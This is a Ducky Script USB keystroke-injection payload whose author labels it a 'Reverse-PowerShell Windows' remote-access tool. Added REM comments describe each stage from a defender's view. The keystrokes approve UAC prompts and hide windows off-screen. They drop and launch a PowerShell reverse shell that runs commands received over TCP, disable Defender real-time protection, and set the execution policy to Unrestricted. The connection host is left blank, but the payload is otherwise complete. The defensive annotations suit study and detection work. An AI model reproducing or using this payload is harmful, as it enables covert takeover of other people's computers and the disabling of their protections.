REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
||
REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
|
||
REM Version: 1.0
|
||
REM Category: Remote_Access
|
||
REM Review note: this file is a Ducky Script (USB keystroke-injection) payload, not a
REM shell script as the file metadata suggests. The REM notes below describe each stage
REM from a defender's perspective: what it does, what it leaves behind, and how it is
REM detected or blocked. Overall flow: type a PowerShell dropper into an elevated Notepad,
REM save it under C:\Windows, then run it from an elevated, hidden console.
REM Host artifacts to look for: C:\Windows\config-34593.ps1 (presumably removed by the
REM dropper itself, see the Remove-Item line) and %TEMP%\34593.ps1 (not removed).
REM Controls that break this chain: standard (non-admin) user accounts so the UAC prompt
REM asks for credentials instead of offering a "Yes" button, Defender Tamper Protection,
REM USB device control for HID devices, and PowerShell script block logging for detection.
DELAY 750
|
||
REM Win+R opens the Run dialog; every STRING line below is typed as keystrokes.
GUI r
|
||
DELAY 1000
|
||
REM Launches Notepad elevated via -Verb runAs, which raises a UAC consent prompt.
STRING powershell Start-Process notepad -Verb runAs
|
||
ENTER
|
||
DELAY 750
|
||
REM ALT y answers the UAC consent dialog. This only works for an account that is already
REM an administrator; a standard user gets a credential prompt that keystrokes cannot pass.
ALT y
|
||
DELAY 750
|
||
ENTER
|
||
REM ALT+SPACE opens the window menu, "m" selects Move, and 100 DOWNARROW presses appear
REM to push the Notepad window off-screen so the typed text is not visible to the user.
ALT SPACE
|
||
DELAY 1000
|
||
STRING m
|
||
DELAY 1000
|
||
DOWNARROW
|
||
REPEAT 100
|
||
ENTER
|
||
REM Typed into Notepad as the first line of the dropper: writes a one-line PowerShell
REM reverse shell to %TEMP%\34593.ps1. That script opens a TCP client, reads text from the
REM socket, runs it with iex and writes the output back. On the host this appears as
REM powershell.exe holding an outbound TCP connection; script block logging records the
REM commands passed to iex.
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
|
||
ENTER
|
||
DELAY 750
|
||
REM Dropper line 2: disables Defender real-time protection. Defender Tamper Protection,
REM when enabled, blocks this change; the attempt is typically recorded in the Defender
REM operational log, and "DisableRealtimeMonitoring" is a high-signal string for script
REM block log alerting.
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
||
DELAY 500
|
||
ENTER
|
||
DELAY 750
|
||
REM Dropper line 3: starts the dropped reverse shell with a hidden window.
REM "-windowstyle hidden" in a powershell.exe command line is a common hunting signal.
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
|
||
ENTER
|
||
REM Dropper line 4: presumably self-deletes the dropper (when run with -File,
REM $MyInvocation.InvocationName should be the script path). The %TEMP% script remains.
STRING Remove-Item $MyINvocation.InvocationName
|
||
ENTER
|
||
REM Saves the Notepad buffer as C:\Windows\config-34593.ps1. Writing under C:\Windows
REM needs the elevation obtained above; an unelevated Notepad would fail here.
CTRL s
|
||
DELAY 1000
|
||
STRING C:\Windows\config-34593.ps1
|
||
ENTER
|
||
DELAY 1000
|
||
REM Closes Notepad.
ALT F4
|
||
DELAY 750
|
||
REM Second elevation: an elevated cmd, again approved with ALT y (see the UAC note above).
GUI r
|
||
DELAY 750
|
||
STRING powershell Start-Process cmd -Verb runAs
|
||
ENTER
|
||
DELAY 750
|
||
ALT y
|
||
DELAY 1000
|
||
REM Shrinks the console to a near-invisible window; the move sequence below then hides it
REM off-screen the same way as the Notepad window.
STRING mode con:cols=14 lines=1
|
||
ENTER
|
||
ALT SPACE
|
||
DELAY 750
|
||
STRING m
|
||
DELAY 750
|
||
DOWNARROW
|
||
REPEAT 100
|
||
ENTER
|
||
REM Persistent change: sets the CurrentUser execution policy to Unrestricted. This outlives
REM the payload and should be reverted during cleanup. Execution policy is not a security
REM boundary; AppLocker/WDAC or Constrained Language Mode are the controls that matter here.
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
|
||
ENTER
|
||
DELAY 750
|
||
REM Runs the saved dropper from the elevated, hidden console.
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
|
||
ENTER
|
|